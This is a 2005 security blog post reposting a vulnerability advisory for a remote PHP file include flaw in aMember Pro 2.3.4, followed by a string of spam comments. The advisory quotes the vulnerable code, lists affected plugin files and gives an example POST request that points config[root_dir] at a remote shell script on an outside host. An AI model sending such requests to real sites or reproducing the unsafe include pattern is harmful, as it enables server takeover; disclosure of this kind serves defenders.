by r0t,der4444,cembo,VietMafia

Monday, September 05, 2005

aMember Pro 2.3.X - Remote File Include Vulnerability

[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
=============================================================================


Software: aMember Pro 2.3.4
Type: Remote PHP File Include Vulnerability
Risk: High

Date: Aug. 16 2005
Vendor: CGI Central


Credit:
=======
NewAngels Team with special note of 4Degrees.


Description:
============
"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually."
[http://www.amember.com/]


PHP Requirements:
=================
register_globals = On


Vulnerability:
==============
Source:
>global $config;
>[...]
>require_once($config['root_dir']."...somestring...");




Exploitation:
=============
This vulnerability exists in several files, the code is not exactly the same in all files.
But the exploit does remain the same.

Example:http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
POST: config[root_dir]=http://www.geocities.com/angelteamfiles/shells/banner.php?

Vulnerable Files:
/aMember/plugins/db/mysql/mysql.inc.php
/aMember/plugins/payment/efsnet/efsnet.inc.php
/aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
/aMember/plugins/payment/cdg/cdg.inc.php
/aMember/plugins/payment/compuworld/compuworld.inc.php
/aMember/plugins/payment/directone/directone.inc.php
/aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
/aMember/plugins/payment/beanstream/beanstream.inc.php
/aMember/plugins/payment/echo/config.inc.php
/aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
/aMember/plugins/payment/eway/eway.inc.php
/aMember/plugins/payment/linkpoint/linkpoint.inc.php
/aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
/aMember/plugins/payment/netbilling/netbilling.inc.php
/aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
/aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
/aMember/plugins/payment/payos/payos.inc.php
/aMember/plugins/payment/payready/payready.inc.php
/aMember/plugins/payment/plugnplay/plugnplay.inc.php

orginal advisory:
http://pridels.blogspot.com/2005/09/amember-pro-23x-remote-file-include.html

10 Comments:

Anonymous Anonymous told...

Go 2 Clickbank **Clickbank, Clickbank Directory** offers you the latest news on Clickbank

2:47 AM

 
Blogger Editor Choice told...

Interesting Blog. well done!.
The following site is interesting:
Go 2 clickbank clickbank Directory, Clickbank secure market place offers you the best choice of products availabe on internet. Just check it.

7:11 AM

 
Anonymous E-gold told...

Hey Blogger this is a good post about aMember Pro 2.3.X - Remote File Include Vulnerability you started here. My site is related to Learn Ecurrency Exchange. Come by and see it if you're interested in that sort of thing.

2:51 AM

 
Anonymous how to make money told...

Hi Blogger, well you know we humans always start doing things on one topic and later found ourselves doing something else, this is always what happened to me. I started looking for something on e-gold 2 hours ago however have found my seself looking at all different topics, of course including your site aMember Pro 2.3.X - Remote File Include Vulnerability. I thought what the hell since I'm here already might as well just leave a few words. Ok I'll go on to search for e-gold related stuff again and hopefully it'll take me longer than last time to lose my concentration. cheers!

12:41 PM

 
Anonymous how to make money told...

Hi Blogger, the content on your blog is quite interesting to me, although it is not quite what I was looking for. I was out searching for stuff on webmasterworld but I have gone through so many different sites that are not relate to the topic I was looking for, I did not feel like to post on any of them until now, I thought it's nice to leave something although aMember Pro 2.3.X - Remote File Include Vulnerability is not exactly webmasterworld related because I still kind of enjoyed it. thanks!

9:46 PM

 
Anonymous Army told...

Excellent site, enjoyed my visit! I will be back soon!

2:57 PM

 
Anonymous currency trading told...

Hey!, Just browsing around for ideas for my new. (While we're at the same topic), I'm just getting started if you want to visit:
currency trading

Charles

2:03 AM

 
Anonymous e currency exchange told...

Hey how are you doing? just letting you know that someone from Central America read your blog!

Regards,
Charles
e currency exchange

6:29 AM

 
Anonymous dxgold told...

Hi, Just browsing around for ideas for my site. (While we're at the same topic), I'm just getting started if you want to visit:
dxgold

Charles

5:21 PM

 
Anonymous Anonymous told...

lol look at all the blog crawler posts all the hey blogger,... and hi blogger,.... and then the say something stupid because it just takes the title of th page and puts it in there. i found this interesting but rather pontless to an extent because almost all major companys that still use amemberpro have this fixed and everyone who doesn't don't really have anything worth looking at anyway

2:54 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew